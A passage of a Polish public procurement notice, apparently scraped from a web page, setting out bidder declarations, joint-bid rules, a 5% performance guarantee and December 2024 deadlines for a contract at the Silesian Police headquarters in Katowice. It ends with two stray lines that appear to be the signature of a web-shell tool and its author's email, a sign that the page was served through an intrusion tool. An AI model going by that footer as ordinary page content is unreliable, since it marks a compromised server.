wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu na podstawie art. 125 ust. 1 ustawy Pzp, aktualnego na<br/>dzień składania ofert –załącznik nr 4 do SWZ;<br/>Zaświadczenie z odbytej wizji na obiekcie Komendy Wojewódzkiej Policji w Katowicach przy ul. Lompy 19 – załącznik nr 11 do SWZ.<br/>Do formularza oferty Wykonawca dołącza również – jeżeli dotyczy:<br/>a) Pełnomocnictwo, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych.<br/>b) Zastrzeżenie tajemnicy przedsiębiorstwa;<br/>c) Wykaz rozwiązań równoważnych;<br/>d) Zobowiązanie podmiotu udostępniającego zasoby – załącznik nr 5 do SWZ.<br/>Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust.1 ustawy w zakresie<br/>podstaw wykluczenia z postępowania oraz art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2024 poz. 507<br/>z późn. zm.) – załącznik nr 9 do SWZ.<br/>Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów ( Dz.U. z 2024 r. poz. 594 z późn. zm.) z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – załącznik nr 10 do SWZ.<br/>Informację z Krajowego Rejestru Karnego w zakresie:<br/>a) art. 108 ust. 1 pkt 1 i 2 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>- sporządzonej nie wcześniej niż 3 miesiące przed jej złożeniem.<br/>Szczegóły: SWZ Sekcja VIII.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz<br/>rodzaju wykonanych usług wraz z podaniem ich wartości, rodzaju, daty, miejsca wykonywania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane wraz z dowodami potwierdzającymi należyte wykonanie tych robót – załącznik nr 6 do SWZ.<br/>Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług i robót, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami – załącznik nr 7 do SWZ.<br/>Szczegóły: SWZ Sekcja VIII.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający, w przedmiotowym postępowaniu, odstępuje od żądania złożenia przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku wspólnego ubiegania się o zamówienie Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>3. Do oferty należy załączyć pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.<br/>4. Oryginał pełnomocnictwa opatrzony kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym przez wykonawców ubiegających się wspólnie o udzielenie zamówienia lub<br/>kopia potwierdzona notarialnie, opatrzona kwalifikowanym podpisem elektronicznym przez notariusza, powinny być<br/>załączone do oferty i zawierać w szczególności wskazanie:<br/>a) postępowania o zamówienie publiczne, którego dotyczą,<br/>b) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby,<br/>c) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>5. Wszelka korespondencja prowadzona będzie przez zamawiającego wyłącznie z wyznaczonym pełnomocnikiem.<br/>6. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>7. W przypadku wspólnego ubiegania się przez Wykonawców o udzielenie zamówienia dokumenty i oświadczenia<br/>wskazane w sekcji VIII pkt. 1.1.1, 1.1.2 oraz pkt. 1.2.1-1.2.3 oraz 1.2.6 składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Informacja dotyczące zaliczek Zamawiający opisał w załączniku nr 2 do SWZ - Projektowanych postanowieniach umowy (§<br/>12). <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy, zgodnie z art. 455 ustawy Pzp.<br/>Szczegóły dot. zmian umowy zawiera załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-11 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przewiduje przeprowadzenie obowiązkowej wizji lokalnej. Termin wizji wskazany został w Sekcji XXIII pkt 10<br/>SWZ.<br/>Poza możliwością unieważnienia postępowania o udzielenie zamówienia na podstawie art. 255 ustawy Pzp, zamawiający<br/>zastrzega możliwość unieważnienia postępowania przed upływem terminu składania ofert, jeżeli wystąpią okoliczności<br/>powodujące, że dalsze prowadzenie postepowania jest nieuzasadnione oraz zgodnie z art. 257 Pzp Zamawiający może<br/>unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które Zamawiający zamierzał przeznaczyć na<br/>sfinansowanie całości lub części zamówienia nie zostały mu przyznane.<br/>Zamawiający nie dokonuje podziału zamówienia na części z uwagi na specyfikę i charakter przedmiotu zamówienia. Podział<br/>zamówienia wygenerowałby zwiększenie kosztów wykonania tegoż zamówienia, stworzyłoby to również zagrożenie<br/>prawidłowego zrealizowania zadania przez potrzebę skoordynowania działań poszczególnych wykonawców, którzy<br/>realizowaliby różne części zamówienia.<br/>W przedmiotowym postępowaniu Zamawiający żąda wniesienia zabezpieczenia należytego wykonania umowy w wysokości<br/>stanowiącej 5% wartości wynagrodzenia brutto.<br/>Zabezpieczenie może być wnoszone według wyboru Wykonawcy w formach określonych w art. 450 ust. 1 ustawy Pzp.<br/>Wybrany wykonawca zobowiązany jest wnieść zabezpieczenie należytego wykonania umowy przed podpisaniem umowy.<br/>Jeżeli zabezpieczenie zostało wniesione w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku<br/>bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku<br/>bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku bankowego oraz<br/>prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.<br/>W przypadku wniesienie zabezpieczenia należytego wykonania umowy w formie innej niż pieniężna – warunki poręczeń i<br/>gwarancji wymagają przed zawarciem umowy akceptacji Zamawiającego.<br/>Zabezpieczenie wnoszone przez Wykonawcę w innej formie niż pieniężna powinno mieć charakter bezwarunkowy, być<br/>nieodwoływalne, a wynikające z niego świadczenie pieniężne powinno być płatne na pierwsze pisemne żądanie<br/>beneficjenta (Zamawiającego) i wykonane na terenie Rzeczpospolitej polskiej, w szczególności treść dokumentu<br/>zabezpieczenia nie może zawierać postanowień:<br/>1) Warunkujących wykonanie świadczenia pieniężnego przez gwaranta od:<br/>- Uwierzytelniania w jakiejkolwiek formie przez osobę trzecią pisemnego żądania beneficjenta zamawiającego);<br/>- wezwania zleceniodawcy(wykonawcy) przez beneficjenta (Zamawiającego do dobrowolnego wykonania lub należytego<br/>wykonania zobowiązania;<br/>- Udowodnienia lub udokumentowania w jakikolwiek sposób przez beneficjenta (Zamawiającego) okoliczności niewykonania<br/>lub nienależytego wykonania zobowiązania przez zleceniodawcę( Wykonawcę);<br/>- Uzgadniania z gwarantem jakichkolwiek zmian w umowie pomiędzy beneficjentem (Zamawiającym) a zleceniodawcą<br/>(Wykonawcą);<br/>- przedstawiania oryginału gwarancji wraz z żądaniem zapłaty beneficjenta (Zamawiającego)<br/>2) Określających termin wygaśnięcia gwarancji przed terminem ustania stosunku zobowiązanego, który zabezpiecza z<br/>zastrzeżeniem zapisów art. 453 ust. 7 ustawy Pzp.<br/>3) Wprowadzających klauzule prorogacyjną, chyba, że jako sąd właściwy do rozstrzygania sporów pomiędzy stronami<br/>wskazano sąd właściwy miejscowo dla beneficjenta (Zamawiającego).<br/>Wykonawcy, którzy wspólnie składają ofertę w postępowaniu o udzielenie zamówienia publicznego ponoszą solidarna<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy (art. 445 ustawy Pzp).<br/>70% zabezpieczenia zwolnione zostanie w ciągu 30 dni po końcowym, bezusterkowym odbiorze przedmiotu umowy.<br/>30% wysokości zabezpieczenia zostanie zwolnione nie później niż w 15 dniu po upływie okresu rękojmi.

Creat By MiNi SheLL
Email: jattceo@gmail.com